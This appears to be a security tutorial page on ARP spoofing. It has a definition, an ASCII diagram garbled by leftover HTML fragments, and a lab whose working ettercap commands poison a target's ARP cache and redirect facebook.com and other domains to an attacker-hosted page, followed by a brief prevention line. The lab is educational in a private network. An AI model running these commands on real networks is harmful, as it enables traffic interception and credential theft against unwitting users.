MITM: ARP spoofing

Description

ARP spoofing (Address Resolution Protocol spoofing) is a type of network attack in which an attacker sends falsified ARP messages to an Ethernet network, in order to link the attacker's MAC address with the IP address of a legitimate computer or server on the network.

ARP is a protocol used by computers to map an IP address to a physical (MAC) address. By manipulating ARP messages, an attacker can convince other devices on the network that their machine has the same MAC address as the legitimate device, thus allowing them to intercept network traffic intended for that device.

ARP spoofing attacks can be used for various purposes: - including eavesdropping on network traffic - stealing sensitive information like login credentials - conducting Man-in-the-Middle attacks.

Diagram

    ┌ │ │ │

     ┌ │ │ │     


href=#__codelineno-0-1>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ┌───┐ │ 1 │ Hi Router ┌────────────┴───┴─────────────────────────┐ │                                          ▼ ────────┴─────────┐ ┌──────────────────┐ ┌──────────────────┐                   │ │                  │ │                  │      VICtim       │ │      Hacker      │ │      Router      │                   │ │                  │ │                  │ class=err>└──────────────────┘ └──────────────────┘ └─────────┬────────┘ ▲                                          │ └────────────┬───┬─────────────────────────┘ │ 2 │ Hi Vic └───┘ class=o>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - name=__codelineno-1-1 href=#__codelineno-1-1>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ┌───┐                      ┌───┐ │ 1 │ Hi Router            │ 2 │ Hi Router ┌┴───┴─────────────┐       ┌┴───┴──────────┐ │                  ▼       │               ▼ ────────┴─────────┐ ┌──────────────┴───┐ ┌──────────────────┐                   │ │                  │ │                  │      VICtim       │ │      Hacker      │ │      Router      │                   │ │                  │ │                  │ class=err>└──────────────────┘ └──────┬───────────┘ └─────────┬────────┘ ▲                  │       ▲               │ └┬───┬─────────────┘       └┬───┬──────────┘ │ 4 │ Hi Vic               │ 3 │ Hi Vic └───┘                      └───┘ class=o>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 Lab
 
 Step 1 – ettercap configuration
 sudo cp /etc/ettercap/etter.dns /etc/ettercap/etter.dns-COPY
# ifconfig 
# ip a
HACKER_IP=10.0.2.15 
echo "" > /etc/ettercap/etter.dns

echo "facebook.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "www.facebook.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "*.facebook.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns

echo "" >> /etc/ettercap/etter.dns

echo "michalszalkowski.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "www.michalszalkowski.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "*.michalszalkowski.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns

echo "" >> /etc/ettercap/etter.dns

echo "9gag.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "www.9gag.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns
echo "*.9gag.com A $HACKER_IP 60" >> /etc/ettercap/etter.dns

cat /etc/ettercap/etter.dns
 Step 2 – malicious page
 mkdir www
cd www
echo "Hacker by Szalek" > index.html
python3 -m http.server 80
 Step 3 – ettercap
 
GATEWAY_IP=10.0.2.1
TARGET=10.0.2.16
sudo ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /$GATEWAY_IP// /$TARGET//
 in appendix you will find how to do the same in GUI
 Step 4 – test
 nslookup michalszalkowski.com
nslookup facebook.com
nslookup 9gag.com

curl michalszalkowski.com
curl facebook.com
curl 9gag.com 
 Prevention
 
 ARP spoofing can be prevented by using network security protocols like ARP inspection and ARP spoofing detection, as well as by using encrypted communication protocols like HTTPS.
 Lab – Appendix